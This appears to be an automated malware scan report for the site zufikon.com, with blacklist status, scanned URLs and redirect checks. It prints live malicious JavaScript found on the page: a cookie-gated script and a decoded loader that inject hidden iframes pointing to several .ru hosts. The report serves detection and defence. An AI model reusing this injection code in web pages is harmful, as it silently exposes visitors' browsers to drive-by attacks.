Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zufikon.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://zufikon.com/ | 200 OK Content-Length: 39355 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://z199070.infobox.ru/go.php?sid=2"> </iframe>'); set_cookie('toppedup', '1010101');} Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://jazzute.ru/count5.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://jazzute.ru/count5.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribu <iframe src='http://jazzute.ru/count5.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://speeded723.personal889.ru/?in=55890 <iframe src="http://speeded723.personal889.ru/?in=55890" width="0" height="0" frameborder="0"> Hidden iFrame found. size: 1x1 src: http://z199070.infobox.ru/go.php?sid=2 <iframe frameborder=0 height=1 width=1 scrolling=no src="http://z199070.infobox.ru/go.php?sid=2"> Hidden iFrame found. size: 0x0 style: hidden src: http://ruunakilndia1.ru/img/header.php?ftd=3540238&path=%7caccounting_model%7cstreak%7c&sys=un&wrk=19 <iframe width="0" height="0" style="display:none;" id="frmchkldver" src="http://ruunakilndia1.ru/img/header.php?ftd=3540238&path=%7caccounting_model%7cstreak%7c&sys=un&wrk=19"> | ||
http://urlt.dyndns.biz/follownb.php?i=17040 | 500 Can't connect to urlt.dyndns.biz:80 Content-Length: 190 Content-Type: text/plain | clean |
http://urlt.dyndns.biz/test404page.js | 500 Can't connect to urlt.dyndns.biz:80 Content-Length: 190 Content-Type: text/plain | clean |
http://www.asca.it/js/jquery.tools.min.js | 200 OK Content-Length: 116685 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zufikon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 04:02:00 GMT
Content-Type: text/html
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
GET / HTTP/1.1
Host: zufikon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 04:02:00 GMT
Content-Type: text/html
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Second query (visit from search engine):
GET / HTTP/1.1
Host: zufikon.com
Referer: http://www.google.com/search?q=zufikon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zufikon.com
Referer: http://www.google.com/search?q=zufikon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.